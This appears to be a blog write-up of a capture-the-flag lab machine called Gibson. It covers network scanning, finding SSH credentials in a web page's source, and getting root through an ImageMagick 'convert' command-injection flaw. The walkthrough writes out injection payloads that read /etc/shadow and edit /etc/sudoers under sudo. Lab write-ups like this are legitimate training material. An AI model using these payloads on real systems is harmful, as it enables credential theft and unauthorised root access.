Gibson:0.2
Tools:
- netdiscover
- Nmap
- Wfuzz
- Nikto
Vulnerability:
ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Multiple Vulnerabilities
Use netdiscover to detect target IP address
netdiscover -i eth0 -r 192.168.79.0/24
![[title manually exploit [alt text]]](/images/blog/vulhub/gibson/Selection_001.png)
192.168.79.196 is the target.
Then run nmap to detect opening ports and running services on the target machine.
nmap -sV -v -O -A -T5 192.168.79.196 -p-
![[title manually exploit [alt text]]](/images/blog/vulhub/gibson/Selection_002.png)
port 22 and 80 are opening.
use wfuzz to scan
1
| |
Nothing cool come out.
check the webpage, find a file davinci.htm. Double click it.
![[title manually exploit [alt text]]](/images/blog/vulhub/gibson/Selection_003.png)
Not useful
![[title manually exploit [alt text]]](/images/blog/vulhub/gibson/Selection_004.png)
check the souce code:
![[title manually exploit [alt text]]](/images/blog/vulhub/gibson/Selection_005.png)
Get a potential username/password margo:god.
login ssh:
![[title manually exploit [alt text]]](/images/blog/vulhub/gibson/Selection_006.png)
get the shell.
Now lets try to get root
sudo -l
![[title manually exploit [alt text]]](/images/blog/vulhub/gibson/Selection_007.png)
try to execute this program
![[title manually exploit [alt text]]](/images/blog/vulhub/gibson/Selection_008.png)
ImageMagick ????
searchsploit ImageMagick
![[title manually exploit [alt text]]](/images/blog/vulhub/gibson/Selection_009.png)
I used that exploit.
convert 'https://example.com"|ls "-la' out.png
![[title manually exploit [alt text]]](/images/blog/vulhub/gibson/Selection_010.png)
works
![[title manually exploit [alt text]]](/images/blog/vulhub/gibson/Selection_011.png)
now try:
sudo convert 'https://example.com"|cat "/etc/shadow' out.png
![[title manually exploit [alt text]]](/images/blog/vulhub/gibson/Selection_012.png)
now
modify the /etc/sudoers
sudo convert 'https://example.com"|vim "/etc/sudoers' out.png
![[title manually exploit [alt text]]](/images/blog/vulhub/gibson/Selection_013.png)
save and quit.
ssh to the box as margo,
sudo su
![[title manually exploit [alt text]]](/images/blog/vulhub/gibson/Selection_014.png)
Game Over